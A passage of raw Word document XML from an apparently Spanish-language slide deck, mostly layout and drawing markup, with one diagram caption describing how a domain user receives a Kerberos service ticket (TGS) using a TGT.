        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF9B91" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795FAEC3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C06BAB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EEF70A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C0FE2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E3B9A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="9004" w:right="6887" w:hanging="60"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Basado en los </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>privilegios del Usuario del Dominio y usando TGT, se otorga un TGS al Usuario del Dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54E839" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435D95EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784D3B0C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DF4407" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2141A65F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E985E94" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66714C53" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2389F009" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="189"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCA419D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="1"/>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57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534414A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId81"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D924CE"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51424" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="163B03DA" wp14:editId="710F89E6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1754124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9281160" cy="651383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1160" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9281160" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="188" name="Image 188"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="189" name="Image 189"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId68" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1441449" y="141863"/>
                            <a:ext cx="6163436" cy="338074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="190" name="Image 190"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="7697215" y="302899"/>
                            <a:ext cx="254000" cy="67818"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="191" name="Image 191"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId82" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="8042909" y="158627"/>
                            <a:ext cx="1237742" cy="321310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="192" name="Graphic 192"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3154679" y="3666748"/>
                            <a:ext cx="2880360" cy="739140"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2880360" h="739140">
                                <a:moveTo>
                                  <a:pt x="2880359" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="739139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2880359" y="739139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2880359" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="193" name="Graphic 193"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3154679" y="3666748"/>
                            <a:ext cx="2880360" cy="739140"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2880360" h="739140">
                                <a:moveTo>
                                  <a:pt x="0" y="739139"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2880359" y="739139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2880359" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="739139"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="4471C4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="194" name="Graphic 194"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2627375" y="1965582"/>
                            <a:ext cx="4976495" cy="2816860"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4976495" h="2816860">
                                <a:moveTo>
                                  <a:pt x="3933825" y="2778633"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="2772283"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2740533"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2772283"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2772283"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2784983"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2784983"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2816733"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="2784983"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3933825" y="2778633"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4976495" h="2816860">
                                <a:moveTo>
                                  <a:pt x="4817910" y="837196"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4782820" y="799465"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4733163" y="753491"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4696460" y="723773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4657217" y="694563"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4615180" y="665861"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4570730" y="637667"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4523867" y="610235"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4495038" y="594347"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4474591" y="583057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4423156" y="556514"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4369435" y="530352"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4313682" y="504698"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4256024" y="479425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4196334" y="454406"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4134866" y="429895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4071747" y="405765"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4006977" y="382016"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3940810" y="358521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3803904" y="312420"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3662045" y="267335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3515741" y="223266"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3213100" y="137160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2818422" y="30708"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2819298" y="27432"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2826639" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2743200" y="17145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2806954" y="73660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2815171" y="42913"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3209798" y="149352"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3512185" y="235458"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3658235" y="279527"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3799840" y="324485"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3936619" y="370459"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4002659" y="393954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4067302" y="417703"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4130294" y="441706"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4191508" y="466217"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4250944" y="490982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4308475" y="516255"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4363974" y="541782"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4417314" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4464824" y="592239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4517517" y="621157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4563503" y="648157"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4608195" y="676402"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4648911" y="704265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4687748" y="733005"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4688510" y="733653"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4688789" y="733856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4724781" y="763143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4758182" y="793115"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4788535" y="823595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4802873" y="839089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4801133" y="837196"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4817910" y="837196"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4976495" h="2816860">
                                <a:moveTo>
                                  <a:pt x="4976101" y="1266063"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4974882" y="1229766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4974844" y="1228598"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4971910" y="1193304"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4971796" y="1191768"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4967033" y="1155738"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4966970" y="1155192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4951476" y="1083437"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4927600" y="1013333"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4903724" y="961898"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4884674" y="928370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4863211" y="895223"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4839081" y="862711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4819510" y="839089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4802873" y="839089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4802733" y="839089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4829048" y="870585"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4852670" y="902462"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4873752" y="934847"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4892433" y="967803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4892306" y="967803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4893805" y="970559"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4894072" y="971029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4898034" y="978916"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4900701" y="984427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4900892" y="984592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4908448" y="1000925"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4915497" y="1017612"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4926990" y="1048131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4928489" y="1052068"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4947691" y="1121130"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4958969" y="1191399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4959121" y="1193304"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4962068" y="1228598"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4962156" y="1229766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4963401" y="1265809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4962906" y="1302766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4957699" y="1377696"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4946904" y="1453769"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4931537" y="1530985"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4922266" y="1569974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4912106" y="1609102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4901184" y="1648460"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4889500" y="1687957"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4877854" y="1725409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4850892" y="1807083"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4823206" y="1887093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4794758" y="1967230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4806696" y="1971548"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4835144" y="1891284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4862957" y="1811274"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4889246" y="1731391"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4901692" y="1691640"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4913376" y="1652016"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4924425" y="1612404"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4934585" y="1573022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4943983" y="1533906"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4952238" y="1494917"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4959477" y="1456055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4965573" y="1417447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4970272" y="1379093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4973701" y="1341120"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4975606" y="1303274"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4976101" y="126606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46658F" id="Group 187" o:spid="_x0000_s1026" style="position:absolute;margin-left:138.1pt;margin-top:1.45pt;width:730.8pt;height:512.9pt;z-index:-17965056;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="92811,6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">
                <v:shape id="Image 188" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:86837;height:6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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Image 189" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:14414;top:1418;width:61634;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">
                  <v:imagedata r:id="rId72" o:title=""/>
                </v:shape>
                <v:shape id="Image 190" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:76972;top:3028;width:254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">
                  <v:imagedata r:id="rId73" o:title=""/>
                </v:shape>
                <v:shape id="Image 191" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:80429;top:1586;width:12377;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">
                  <v:imagedata r:id="rId83" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 192" o:spid="_x0000_s1031" style="position:absolute;left:31546;top:36667;width:28804;height:7391;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="288036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" path="m2880359,l,,,739139r2880359,l2880359,xe" fillcolor="#e7e6e6" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 193" o:spid="_x0000_s1032" style="position:absolute;left:31546;top:36667;width:28804;height:7391;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="288036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" path="m,739139r2880359,l2880359,,,,,739139xe" filled="f" strokecolor="#4471c4" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 194" o:spid="_x0000_s1033" style="position:absolute;left:26273;top:19655;width:49765;height:28169;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4976495,28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" path="m3933825,2778633r-12700,-6350l3857625,2740533r,31750l,2772283r,12700l3857625,2784983r,31750l3921125,2784983r12700,-6350xem4817910,837196r-35090,-37731l4733163,753491r-36703,-29718l4657217,694563r-42037,-28702l4570730,637667r-46863,-27432l4495038,594347r-20447,-11290l4423156,556514r-53721,-26162l4313682,504698r-57658,-25273l4196334,454406r-61468,-24511l4071747,405765r-64770,-23749l3940810,358521,3803904,312420,3662045,267335,3515741,223266,3213100,137160,2818422,30708r876,-3276l2826639,r-83439,17145l2806954,73660r8217,-30747l3209798,149352r302387,86106l3658235,279527r141605,44958l3936619,370459r66040,23495l4067302,417703r62992,24003l4191508,466217r59436,24765l4308475,516255r55499,25527l4417314,567817r47510,24422l4517517,621157r45986,27000l4608195,676402r40716,27863l4687748,733005r762,648l4688789,733856r35992,29287l4758182,793115r30353,30480l4802873,839089r-1740,-1893l4817910,837196xem4976101,1266063r-1219,-36297l4974844,1228598r-2934,-35294l4971796,1191768r-4763,-36030l4966970,1155192r-15494,-71755l4927600,1013333r-23876,-51435l4884674,928370r-21463,-33147l4839081,862711r-19571,-23622l4802873,839089r-140,l4829048,870585r23622,31877l4873752,934847r18681,32956l4892306,967803r1499,2756l4894072,971029r3962,7887l4900701,984427r191,165l4908448,1000925r7049,16687l4926990,1048131r1499,3937l4947691,1121130r11278,70269l4959121,1193304r2947,35294l4962156,1229766r1245,36043l4962906,1302766r-5207,74930l4946904,1453769r-15367,77216l4922266,1569974r-10160,39128l4901184,1648460r-11684,39497l4877854,1725409r-26962,81674l4823206,1887093r-28448,80137l4806696,1971548r28448,-80264l4862957,1811274r26289,-79883l4901692,1691640r11684,-39624l4924425,1612404r10160,-39382l4943983,1533906r8255,-38989l4959477,1456055r6096,-38608l4970272,1379093r3429,-37973l4975606,1303274r495,-37211xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665E062" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
